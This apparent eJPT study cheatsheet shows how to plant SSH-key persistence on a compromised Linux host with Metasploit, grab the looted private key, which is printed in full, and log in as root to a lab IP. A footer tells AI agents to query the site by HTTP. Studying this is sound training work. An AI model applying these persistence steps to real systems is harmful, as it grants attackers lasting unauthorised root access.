# SSHkey persistence module

### Perform **SSH Persistence** with a Metasploit persistence modules

```
exit # CTRL+C
background
```

```
search platform:linux persistence
use post/linux/manage/sshkey_persistence
info
# Description:
#   This module will add an SSH key to a specified user (or all), to 
#   allow remote login via SSH at any time.
set SESSION 4
set CREATESSHFOLDER true
run
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-c4df8d51d55d8c6dde28fd1c32ccd6d376fcfa49%252Fimage-20230422165505058.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=72a3811d435f01c9b6badca77e8316853fe265f1a0dc05abe4c08d2df6dab03d" alt=""><figcaption></figcaption></figure>

* Access the private key and copy the content of the `id_rsa` file and save it as a new file. Assign the appropriate permissions to the file

```
loot
cat /root/.msf4/loot/20230422145422_Linux_Persistenc_192.101.97.3_id_rsa_460359.txt
```

* Exit the `msfconsole` with command **`exit -y`**. All the sessions will be closed.

```
vim ssh_key

# Add the private key, save and exit vim --> :wq
```

```
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0Xp0HZyPC+dUSBRJGhFbqG3pl4+Z1hu3jOfGE6zax4TZUK0x
eZ6gSPhNoVLDT8iaB3Hp5lyXY+Ly/o8Uw/SofZbJin3jpfL96f9YdR4fJ3ECoIwB
EBLDveMNRKFhLU5ZqrdpwyvZi+j4rtuAK3SOdYxHdWZqSAEntFp9PDrcMaAckbNk
48oKpkOyQ57bQf5NZrl+pUp4rkXV3gtm4WUD2R4tnFYsM++3uPO7+VDcW4Rjz2nd
3zz/pKn4EKtP2IcYHGr3nomv7syKFsFiharFOczcDigCw+WPnpUKHIAcfrTv25V+
iZC7VrUFV/r5OBKXl2LhV7efgR0nugYISROiKwIDAQABAoIBAQCOApLnZDSBoGC9
wKrSNkRKCcFbUym6Qe4MYzAgNIXYztI4ZEFvLr+A2HxgSmhIFTl+pJYp6kljmP6c
3kj4k0sKYQfekHudC/9g/A9uzm3WYkGir2clC2ORvnRHO5RSj5QwLMlRW8/OjrDQ
cdQRIaJWRDRJfZW9nLLbDKFsDIcsSCGDjgSPk6LXOmVD0xfGhT++IPFRzeMIQPC4
1DnQ5gPHIeUQ6EDHy+ULdANRONQA/8SiAMFVKL8QlkDsJHXak+ouomwdZk7w/vhj
v7bStU73vzPmCUQUTyfF6qmTqZ7MrgF9qHfWCS7+W6pXIU1SW5S23VbU/3XRWwIQ
WmPi7+d5AoGBAPe64klNRJH1c4jvtG9wckNzThPyKjPv5Qun7qMh/pCEVB0rXD7S
5vGdgC2VbrjsnErX/gYfhP/fXF1V5VFf3fjflH67e3aU+Zt3ueiZLW3pp1+odpwO
6YxIS15/vjFTr/G0JbkLaUgmGx0ytsUrIaMgVwwEbQKEQp1oW1tP0m1/AoGBANh4
qxzJ70DuvGsAd+RkAt91rV8xx4jd9Dpnl0o2/FtMC2ML6K7yjLx0MRBkH+CAt+Ia
HihTQpdcfwoZ3gcBL9VQUkaqleNukVLgOz6beCbAJyukMr73TEb6DwQe3j3xeEFB
JxS5IkOUwKWA4Oju6/hrw4/v+FsfkhwJuD/kLDlVAoGAP9ggHXgWZe92GSJ9xAKc
0BlVU/qjOcNnqjtbWxuVubUA4IueOGquLjLDJ/xNDseb+AX2Z6mT40WzTjKm6PPm
Bw/H+2liBkuakKCofvOLK7p98j8+YjXNpuOy2OXfJGNHAunElw4D0h5P+pRpWiMl
hh79kBFL7swbRunwMXY+6w0CgYBIXcauYB+YsHbSupxaAMkpFPj5ivWunqyn3buo
9srUZo6j9PY7jiBYW+uPFDnH3qAaeSq9xl/LpANgSBd+dfocsLZgo2RqXKs+bnG/
00+OfMxbfY/tYVThoXTlpsAbKx9NiU9cUSvQNelVKsmFdWHzcWs2Mj3vkJVSxDkR
OuFB5QKBgQDwkbPu1MJy7VJVGfky7RZYkuqsDB1sdmS9JL+HwCC4M3Ox3q4zKvCQ
rZ2zCzqdgVAL/OhV7pxBFKPJ1+jEKcp+ItUIPaVFzrg7V29Qco9yePjCHPLepkTe
zpo9B6Oiq0fAKlYI0LJ9Bw+jSQU5Q7BUUxBSm07QbITuxJdgmVoxdw==
-----END RSA PRIVATE KEY-----
```

```
chmod 0400 ssh_key
```

* Authenticate to the target with the private key

```
ssh -i ssh_key root@192.101.97.3
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-0b56fd02aaea5295587e9a929345c20bfe061881%252Fimage-20230422170517426.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=fd70c0128349ab6e7df16082dbeed8b7063528d68d4399cdc5100fac0f747285" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/post-exploitation/persistence/linux-persistence/sshkey-persistence-module.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.